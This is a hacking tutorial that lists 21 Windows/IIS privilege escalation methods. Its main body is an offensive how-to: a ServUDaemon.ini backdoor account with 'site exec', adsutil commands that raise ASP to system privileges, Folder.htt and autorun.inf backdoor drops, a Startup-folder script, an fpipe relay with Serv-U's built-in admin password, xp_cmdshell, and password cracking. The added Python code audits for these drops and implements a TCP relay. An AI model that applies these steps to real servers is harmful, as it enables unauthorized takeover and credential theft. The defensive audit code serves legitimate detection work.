21 Privilege Escalation Methods _ Security Tutorial

Source: Internet
Author: User
Tags: mssql, mssql server, pcanywhere
Author: Nah. Article source: http://blog.77169.com/more.asp?name=atan19a&id=6866

All of the following is my summary of the privilege escalation methods collected so far. Many of them I have not yet had a chance to test and have not succeeded with myself, but I have seen others succeed with them.

Apart from the first method, which is my own research, the rest is a summary of other people's experience. I hope it helps someone!

1. radmin connection method

The condition is that you already have enough permission on the target and the target has no firewall. Upload a radmin server, run it so that it opens its listening port on the target, and then connect to that port with the radmin client.

I have never succeeded with this one myself; the port was open on the target side.

2. pcAnywhere

Download the .CIF files from C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ (these caller files hold the stored account and password), install pcAnywhere locally and crack them there.

3. SAM cracking

Take the SAM from C:\WINNT\system32\config\ and crack it. Note that the running system keeps this file open and locked, so you need a copy obtained another way (a backup, or a dump taken with sufficient privileges) rather than the live file.

4. Serv-U password seizure

Look under C:\Documents and Settings\All Users\Start Menu\Programs\ for the Serv-U shortcut.

Reference: view the shortcut's properties locally to learn the Serv-U install path, then see whether you can traverse into that directory. Once in, if you have permission to modify ServUDaemon.ini, add a user with an empty password:
[User=wekwen|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=f:\|RWAMELCDP
SKEYValues=
This user has the highest privileges: Maintenance=System makes it a Serv-U administrator, and the Access lines give it full rights on those drives. FTP in as this user and use quote site exec xxx to run commands in Serv-U's own context, which by default is the LocalSystem service account, so the commands run with system privileges.
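
A ServUDaemon.ini you can read is also one you can audit. The following is an added example, not code from the original article, that parses the file and flags exactly the kind of account planted above: Maintenance=System, an empty password, or write/execute rights on a drive root. The sample ini is constructed for the example, and Serv-U's flag letters are read here as W=write and E=execute.

```python
"""Audit a Serv-U ServUDaemon.ini for users that hand over the server.
Added example, not from the original article; SAMPLE_INI is constructed."""
import re

# Constructed sample in the format shown above (not taken from a real server).
SAMPLE_INI = """\
[GLOBAL]
Version=4.0.0.4

[DOMAIN1]
ServerName=ftp

[USER=admin|1]
Password=ejC3A1B2C3D4E5F6
HomeDir=c:\\ftproot
Maintenance=None
Access1=c:\\ftproot|RWAMELCDP

[USER=wekwen|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=c:\\|RWAMELCDP
Access2=d:\\|RWAMELCDP
SKEYValues=
"""

USER_SECTION = re.compile(r"^\[USER=([^|\]]+)(?:\|\d+)?\]$", re.IGNORECASE)
DRIVE_ROOT = re.compile(r"^[a-z]:\\?$", re.IGNORECASE)


def parse_servu_ini(text):
    """Return {username: {lower-cased key: value, 'access': [(path, flags), ...]}}.
    Only [USER=...] sections are collected; GLOBAL/DOMAIN sections are skipped."""
    users, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = USER_SECTION.match(line)
        if m:
            current = users.setdefault(m.group(1), {"access": []})
            continue
        if line.startswith("["):          # some other section: stop collecting
            current = None
            continue
        if current is None or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        if re.fullmatch(r"access\d+", key, re.IGNORECASE):
            path, _, flags = value.partition("|")
            current["access"].append((path.strip(), flags.strip().upper()))
        else:
            current[key.lower()] = value
    return users


def audit_servu_users(text):
    """Return (username, finding) pairs for accounts an attacker could have planted."""
    findings = []
    for name, u in parse_servu_ini(text).items():
        if u.get("maintenance", "None").lower() == "system":
            findings.append((name, "Maintenance=System: server-wide admin, can SITE EXEC"))
        if u.get("password", "") == "":
            findings.append((name, "empty password"))
        for path, flags in u["access"]:
            # W = write, E = execute (assumed reading of Serv-U's flag letters)
            if DRIVE_ROOT.match(path) and ("W" in flags or "E" in flags):
                findings.append((name, "write/execute on drive root %s (%s)" % (path, flags)))
    return findings


if __name__ == "__main__":
    for name, finding in audit_servu_users(SAMPLE_INI):
        print("%-12s %s" % (name, finding))
```

Run it against a copy of the real file (open(path).read()) to list planted accounts; the legitimate admin in the sample produces no findings because its password is set, its home is below the root, and it is not a System-maintenance user.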

5. C:\winnt\system32\inetsrv\data\

Reference: this directory is also Everyone: Full Control by default, so all we have to do is upload the escalation tools there and then execute them.

6. Serv-U overflow escalation

There are already more than enough detailed tutorials about this online.

7. Running cscript

Reference: Run "cscript C:\Inetpub\AdminScripts\adsutil.vbs get W3svc/InProcessIsapiApps" from the C:\Inetpub\AdminScripts directory.

This lists the ISAPI DLLs that IIS loads in-process, i.e. inside inetinfo.exe with its privileges. By default they are idq.dll, httpext.dll, httpodbc.dll, ssinc.dll and msw3prt.dll. The trick is to add asp.dll to this privileged set so that ASP pages run with the same privileges. asp.dll is at C:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine).

We add it with:
cscript adsutil.vbs set W3svc/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\WINNT\system32\inetsrv\asp.dll"

Note that set replaces the whole list, so the existing entries must be passed again together with asp.dll. Afterwards run cscript adsutil.vbs get W3svc/InProcessIsapiApps to confirm that it was added.

8. Script escalation

Write a .bat or .vbs into C:\Documents and Settings\All Users\Start Menu\Programs\Startup; it runs the next time any user, including the administrator, logs on.

9. VNC

This one is from Little Flower's article, hoho.

By default VNC stores its password in HKCU\Software\ORL\WinVNC3\Password. The value is only 8 bytes encrypted with a fixed DES key built into VNC, which is why it can be recovered directly. We can use vncx4 to crack it; vncx4 is easy to use, just run at the command line:

C:\>vncx4 -w

Then enter each byte of the hex value in order, pressing Enter after each one, and you're done.

10. nc escalation

Give the target an nc (netcat). The only condition is that you have enough permission to run it; then bounce a shell back to your own machine. Hoho, done.

11. Social engineering to escalate

It is easy to find the target's support or contact details. Once you know the account name, guess the password as thoroughly as you can; it may well be his QQ number, mailbox name or mobile phone number. Try them and see, hoho.

12. IPC$ null session

If the target is careless, scan its IPC$ share; with luck you find a null session or a weak password.

13. Service replacement

No need to explain this one, is there? Personally I find it fairly involved.

14. autorun.inf

Write an autorun.inf with an [autorun] section and open=xxx.exe, give it the read-only, system and hidden attributes, and drop it into the root of whichever drive you like. Believe it or not, the program runs when that drive is opened in Explorer.

15. Desktop.ini and Folder.htt

Reference: First create a folder locally (the name does not matter), enter it, right-click on an empty area and choose "Customize This Folder" (XP does not seem to offer this). Click Next all the way through, accepting the defaults. When you are done you will find two new items in the folder: a Folder Settings directory and a Desktop.ini file (if you cannot see them, first turn off "Hide protected operating system files"). Now open Folder.htt in the Folder Settings directory with Notepad and add the following code anywhere:
<object id="RunIt" width=0 height=0 type="application/x-oleobject" codebase="your backdoor filename"></object>
Then put your backdoor file in the Folder Settings directory and upload that directory together with Desktop.ini into any directory on the target. As soon as an administrator browses that directory in Explorer, our backdoor executes.
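
Methods 8, 14 and 15 all leave a file on disk that Explorer or the logon process will run for us, which also makes them easy to hunt for. The following is an added example, not code from the original article, that scans a directory tree for the three drops: a script in a Startup folder, an autorun.inf whose open= or shellexecute= names a program, and a Folder.htt whose <object> carries a codebase. The sample tree, file names (update.vbs, backdoor.exe) and contents are constructed in a temporary directory for the example.

```python
"""Scan a directory tree for the three Explorer auto-execution drops described
in the article: a script in a Startup folder (method 8), an autorun.inf whose
open= points at a program (method 14), and a Folder.htt whose <object> has a
codebase (method 15). Added example, not from the original article; the sample
tree is constructed in a temporary directory."""
import os
import shutil
import tempfile
from html.parser import HTMLParser

STARTUP_SUFFIXES = (".bat", ".cmd", ".vbs", ".js", ".exe", ".scr", ".pif", ".lnk")


class _ObjectFinder(HTMLParser):
    """Collect the attributes of every <object> tag in a Folder.htt."""
    def __init__(self):
        super().__init__()
        self.objects = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "object":
            self.objects.append({k.lower(): (v or "") for k, v in attrs})


def folder_htt_objects(text):
    parser = _ObjectFinder()
    parser.feed(text)
    return parser.objects


def autorun_targets(text):
    """Programs an autorun.inf would launch: open= and shellexecute= in [autorun]."""
    targets, in_autorun = [], False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("["):
            in_autorun = s.lower() == "[autorun]"
            continue
        if in_autorun and "=" in s:
            key, value = (x.strip() for x in s.split("=", 1))
            if key.lower() in ("open", "shellexecute"):
                targets.append(value)
    return targets


def _read(path):
    with open(path, encoding="latin-1") as fh:
        return fh.read()


def _write(path, text):
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(text)


def scan_tree(root):
    """Walk root and return (path, finding) pairs; file names are matched case-insensitively."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        by_lower = {f.lower(): f for f in filenames}
        if os.path.basename(dirpath).lower() == "startup":
            for f in filenames:
                if f.lower().endswith(STARTUP_SUFFIXES):
                    findings.append((os.path.join(dirpath, f), "runs at logon from Startup folder"))
        if "autorun.inf" in by_lower:
            path = os.path.join(dirpath, by_lower["autorun.inf"])
            for target in autorun_targets(_read(path)):
                findings.append((path, "autorun.inf launches %s" % target))
        if "folder.htt" in by_lower:
            path = os.path.join(dirpath, by_lower["folder.htt"])
            for obj in folder_htt_objects(_read(path)):
                if obj.get("codebase"):
                    findings.append((path, "Folder.htt <object> codebase=%s" % obj["codebase"]))
    return findings


def build_sample_tree():
    """Constructed fixture with one instance of each drop. Returns its root."""
    root = tempfile.mkdtemp(prefix="drops_")
    startup = os.path.join(root, "All Users", "Start Menu", "Programs", "Startup")
    settings = os.path.join(root, "share", "Folder Settings")
    os.makedirs(startup)
    os.makedirs(settings)
    _write(os.path.join(startup, "update.vbs"), 'CreateObject("WScript.Shell").Run "cmd.exe"\n')
    _write(os.path.join(root, "autorun.inf"), "[autorun]\nopen=xxx.exe\nicon=xxx.exe\n")
    _write(os.path.join(root, "share", "Desktop.ini"), "[.ShellClassInfo]\n")
    _write(os.path.join(settings, "Folder.htt"),
           '<html><body>\n<object id="RunIt" width=0 height=0 type="application/x-oleobject" '
           'codebase="backdoor.exe"></object>\n</body></html>\n')
    return root


def cleanup(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        for path, finding in scan_tree(root):
            print(finding, "->", os.path.relpath(path, root))
    finally:
        cleanup(root)
```

Point scan_tree at a drive root or a web root to find the same three artifacts on a real machine; the icon= line in the sample autorun.inf is deliberately ignored, since only open= and shellexecute= launch anything.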

16. Serv-U config overwrite

Install Serv-U locally, overwrite your own ServUDaemon.ini with the ServUDaemon.ini downloaded from the target, and restart Serv-U. Your configuration is then exactly the same as his, accounts and passwords included.

17. Forwarding the Serv-U local management port

43958 is Serv-U's local management port, which listens only on 127.0.0.1. Upload FPipe.exe and run:
fpipe -v -l 3333 -r 43958 127.0.0.1
which maps port 3333 on the target to 127.0.0.1:43958. You can then install Serv-U locally, create a new server with the target's IP and port 3333, the account LocalAdministrator and the password #l@$ak#.lk;0@P, and connect. Now you can manage his Serv-U.
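
What FPipe does here is a plain TCP relay: accept on a reachable port and copy bytes both ways to a port that only listens on the loopback interface. The following is an added example, not code from the original article and not FPipe itself, that implements that relay and exercises it end to end. Hosts and ports are parameters; the self-test stands in a constructed echo server on an ephemeral port for Serv-U's 43958.

```python
"""Minimal TCP relay doing what the fpipe command above does: accept on a
reachable port and forward each connection to a service that only listens on
127.0.0.1. Added example, not from the original article and not FPipe itself;
the echo server is a constructed stand-in for the loopback-only service."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    peer sees EOF too. The caller closes both sockets once both directions finish."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client, remote_host, remote_port):
    """Open the remote side and run one pump per direction."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=5)
    except OSError:
        client.close()
        return
    remote.settimeout(None)
    up = threading.Thread(target=_pump, args=(client, remote))
    down = threading.Thread(target=_pump, args=(remote, client))
    up.start()
    down.start()
    up.join()
    down.join()
    client.close()
    remote.close()


def start_forwarder(listen_port, remote_port, remote_host="127.0.0.1", listen_host="0.0.0.0"):
    """Equivalent of 'fpipe -l <listen_port> -r <remote_port> <remote_host>'.
    Returns the listening socket (port 0 = pick a free one); closing it stops
    the accept loop, which runs in a daemon thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:        # listener closed
                return
            threading.Thread(target=_relay, args=(client, remote_host, remote_port), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def start_echo_server():
    """Constructed stand-in for a loopback-only service: echoes each connection
    back to itself. Bound to 127.0.0.1 on an ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(4)

    def echo(conn):
        _pump(conn, conn)
        conn.close()

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=echo, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def roundtrip(payload):
    """Send payload through forwarder -> echo server and return what comes back."""
    echo = start_echo_server()
    fwd = start_forwarder(0, echo.getsockname()[1], listen_host="127.0.0.1")
    try:
        with socket.create_connection(fwd.getsockname(), timeout=10) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)
            chunks = []
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        return b"".join(chunks)
    finally:
        fwd.close()
        echo.close()


if __name__ == "__main__":
    print(roundtrip(b"USER LocalAdministrator\r\n"))
```

On the target the call would be start_forwarder(3333, 43958), listening on all interfaces, and the Serv-U administration client connects to the target's IP on 3333 exactly as with FPipe. The defensive reading is the same: a service "protected" by binding to 127.0.0.1 is only protected until someone can run code on the host.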

18. SQL account password disclosure

If the target is running MSSQL Server, we can use an SQL connection tool with the administrator account, which can often be taken from the ASP files that connect to the database, because MSSQL runs with SYSTEM permissions by default.

Reference: if the target has not removed xp_cmdshell, use SqlExec.exe: fill in the target IP in the host field and the username and password you obtained in the user and pass fields. The command format is xp_cmdshell '%s' (your command is substituted for %s). Click Connect, and you can then enter whatever cmd commands you want in the CMD column.

19. asp.dll

Reference: asp.dll is at C:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine). We add it to the in-process list with:
cscript adsutil.vbs set W3svc/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\WINNT\system32\inetsrv\asp.dll"
Now run cscript adsutil.vbs get W3svc/InProcessIsapiApps to check that it was added. Note the difference between get and set: one views the list, the other sets it. Both must be run from the C:\inetpub\adminscripts directory.

So if you are an administrator and your machine has had ASP pushed up to system permissions with this trick, the way to undo it is to take asp.dll back out of the privileged set: run set again with only the original five DLLs, overwriting what was just added.
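
Methods 7 and 19 hinge on one metabase list, so both the attack and the cleanup come down to reading that list and rewriting it. The following is an added example, not code from the original article, that parses the output of adsutil.vbs get, reports anything beyond the five DLLs the article names as the default set, and builds the set command that restores the baseline. SAMPLE_OUTPUT is constructed to resemble adsutil's LIST output and is not captured from a real host; confirm the exact layout on your own IIS 5 machine before trusting the parser on live output.

```python
"""Compare IIS 5's InProcessIsapiApps list (as printed by adsutil.vbs) against
the default in-process ISAPI set, flag extras such as asp.dll, and build the
'set' command that restores the baseline. Added example, not from the original
article; SAMPLE_OUTPUT is constructed, not captured from a real host."""
import re
import subprocess

ADSUTIL = r"C:\Inetpub\AdminScripts\adsutil.vbs"

# The five DLLs the article lists as the default in-process set, lower-cased
# because NTFS paths are case-insensitive.
DEFAULT_INPROC = frozenset({
    r"c:\winnt\system32\idq.dll",
    r"c:\winnt\system32\inetsrv\httpext.dll",
    r"c:\winnt\system32\inetsrv\httpodbc.dll",
    r"c:\winnt\system32\inetsrv\ssinc.dll",
    r"c:\winnt\system32\msw3prt.dll",
})

# Constructed: the list after asp.dll has been added with the command above.
SAMPLE_OUTPUT = r"""
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\WINNT\system32\idq.dll"
  "C:\WINNT\system32\inetsrv\httpext.dll"
  "C:\WINNT\system32\inetsrv\httpodbc.dll"
  "C:\WINNT\system32\inetsrv\ssinc.dll"
  "C:\WINNT\system32\msw3prt.dll"
  "C:\Winnt\System32\inetsrv\asp.dll"
"""


def parse_inproc_list(output):
    """Quoted paths, one per line, from adsutil's LIST output, lower-cased."""
    return [p.lower() for p in re.findall(r'^\s*"([^"]+)"\s*$', output, re.MULTILINE)]


def unexpected_inproc(output, baseline=DEFAULT_INPROC):
    """Entries in the live list that are not part of the baseline."""
    return [p for p in parse_inproc_list(output) if p not in baseline]


def restore_command(output, baseline=DEFAULT_INPROC, script=ADSUTIL):
    """The adsutil 'set' that rewrites the list to baseline entries only.
    'set' replaces the whole list, so every DLL that should stay is passed again."""
    keep = [p for p in parse_inproc_list(output) if p in baseline]
    quoted = " ".join('"%s"' % p for p in keep)
    return "cscript //nologo %s set W3SVC/InProcessIsapiApps %s" % (script, quoted)


def live_inproc_list(script=ADSUTIL):
    """Run adsutil on an IIS 5 host and return its in-process list
    (not exercised by the offline self-test)."""
    out = subprocess.check_output(
        ["cscript", "//nologo", script, "get", "W3SVC/InProcessIsapiApps"], text=True)
    return parse_inproc_list(out)


if __name__ == "__main__":
    for extra in unexpected_inproc(SAMPLE_OUTPUT):
        print("not in baseline:", extra)
    print(restore_command(SAMPLE_OUTPUT))
```

On a real host, unexpected_inproc(live_inproc_list()) is the check to schedule; an empty result means nothing has been added to the in-process set, and anything else is worth treating as a compromised server rather than a misconfiguration.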

20. Magic Winmail

If you already have a webshell, see http://www.eviloctal.com/forum/read.php?tid=3587.

21. DBO ...

In fact there are many ways to escalate privileges; it all depends on how we use them. Hoho, keep at it and take control of the server!
